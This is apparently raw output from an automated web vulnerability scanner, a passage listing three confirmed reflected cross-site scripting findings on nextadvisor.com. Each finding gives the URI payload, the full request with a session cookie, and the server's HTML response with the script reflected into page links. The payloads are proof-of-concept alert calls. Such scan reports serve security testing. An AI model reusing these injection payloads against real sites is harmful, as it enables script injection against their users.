id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 
'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/genealogy_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Genealogy FAQ</h1> <p>Frequently Asked Questions about Genealogy</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Genealogy:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input 
type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="genealogy"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..

/genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000222)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000222)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x000222)</script>

Request

GET /genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000222)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/genealogy/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6414
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", genealogy, genealogy research, family tree, family line, ancestors, , Ancestry.com, Archives.com, Footnote.com, Onegreatfamily.com, FamilyBuilder.com" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/genealogy/'"--></style></script><script>netsparker(0x000222)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start 
Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000222)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/genealogy_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Genealogy FAQ</h1> <p>Frequently Asked Questions about Genealogy</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Genealogy:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" 
name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="genealogy"> <input type="hidden" name="FieldData4" 

/identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000238)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000238)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000238)</script>

Request

GET /identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000238)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/identity_theft_protection_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6626
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", identity theft protection, identity theft prevention, id theft, id theft protection, child identity theft, identity theft, stolen identity, Identity Guard Total Protection, TrustedID, LifeLock, ProtectMyID.com, ID Patrol, Identity Theft Shield, Identity Guard Good Start" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/identity_theft_protection_services/'"--></style></script><script>netsparker(0x000238)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The 
trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option 
value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000238)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() 
{ hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/identity_theft_protection_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Identity Theft Protection FAQ</h1> <p>Frequently Asked Questions about Identity Theft Protection</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Identity Theft Protection:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input 
type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="identity_theft_protection_services"> <input type="hidden" name="FieldData4" 

/identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000244)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000244)</script>

Request

GET /identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6643
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", identity theft protection, identity theft prevention, id theft, id theft protection, child identity theft, identity theft, stolen identity, Identity Guard Total Protection, TrustedID, LifeLock, ProtectMyID.com, ID Patrol, Identity Theft Shield, Identity Guard Good Start" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/identity_theft_protection_services/index.php'"--></style></script><script>netsparker(0x000244)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p 
class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option 
value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000244)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub 
Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = 